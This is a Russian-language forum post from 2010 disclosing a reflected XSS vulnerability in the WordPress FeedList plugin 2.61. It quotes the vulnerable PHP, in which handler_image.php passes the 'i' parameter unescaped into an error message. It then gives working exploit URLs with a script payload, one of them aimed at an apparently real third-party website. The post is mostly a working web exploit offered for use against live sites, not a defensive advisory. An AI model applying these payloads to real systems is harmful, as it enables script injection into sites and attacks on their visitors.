Показать сообщение отдельно
Старый 06.07.2010, 18:41   #11
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Plugin name: FeedList (download)
Version: 2.61
Updated: 2010-4-14
Downloads: 37,562

Passive XSS

Vuln file: wp-content/plugins/feedlist/handler_image.php
PHP код:
<?php
// This should be modifed as your own use warrants.
require_once('simplepie.inc');
SimplePie_Misc::display_cached_file($_GET['i'], '../../cache''spi');
?>
Vuln file: wp-content/plugins/feedlist/simplepie.inc
PHP код:
/*...*/
    
function display_cached_file($identifier_url$cache_location './cache'$cache_extension 'spc'$cache_class 'SimplePie_Cache'$cache_name_function 'md5')
    {
        
$cache call_user_func(array($cache_class'create'), $cache_location$identifier_url$cache_extension);

        if (
$file $cache->load())
        {
            if (isset(
$file['headers']['content-type']))
            {
                
header('Content-type:' $file['headers']['content-type']);
            }
            else
            {
                
header('Content-type: application/octet-stream');
            }
            
header('Expires: ' gmdate('D, d M Y H:i:s'time() + 604800) . ' GMT'); // 7 days
            
echo $file['body'];
            exit;
        }

        die(
'Cached file for ' $identifier_url ' cannot be found.');
    }
/*...*/

/*...*/
function create($location$filename$extension)
    {
        
$location_iri =& new SimplePie_IRI($location);
        switch (
$location_iri->get_scheme())
        {
            case 
'mysql':
                if (
extension_loaded('mysql'))
                {
                    return new 
SimplePie_Cache_MySQL($location_iri$filename$extension);
                }
                break;

            default:
                return new 
SimplePie_Cache_File($location$filename$extension);
        }
    }
/*...*/

/*...*/
function load()
    {
        if (
file_exists($this->name) && is_readable($this->name))
        {
            return 
unserialize(file_get_contents($this->name));
        }
        return 
false;
    }
/*...*/ 
Exploit:
Код:
http://[host]/wp-content/plugins/feedlist/handler_image.php?i=<script>alert(123)</script>

http://davaidavai.com/wp-content/plugins/feedlist/handler_image.php?i=%3Cscript%3Ealert%28123%29%3C/script%3E
Note: Мб есть читалка , но почему нет папки cache у мно, я не шарю как включить кеширование страниц.
Strilo4ka вне форума   Ответить с цитированием